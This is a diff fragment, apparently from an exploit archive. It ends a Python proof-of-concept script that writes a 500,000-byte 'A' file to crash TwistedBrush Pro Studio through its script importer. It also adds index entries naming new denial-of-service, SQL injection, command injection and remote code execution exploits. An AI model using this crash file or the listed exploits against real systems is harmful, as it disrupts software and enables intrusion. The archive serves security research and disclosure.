+# 3.- Go to 'Record' > 'Script Player...' 
+# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
+# 5.- Crashed
+
+buffer = "\x41" * 500000
+f = open ("sample.srp", "w")
+f.write(buffer)
+f.close()

files_exploits.csv

@@ -6422,6 +6422,10 @@ id,file,description,date,author,type,platform,port
 46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
 46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
 46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
+46842,exploits/windows/dos/46842.py,"Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17401,6 +17405,7 @@ id,file,description,date,author,type,platform,port
 46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86,
 46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
 46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
+46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41263,3 +41268,7 @@ id,file,description,date,author,type,platform,port
 46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php,
 46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80
 46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php,
+46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
+46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
+46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
+46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80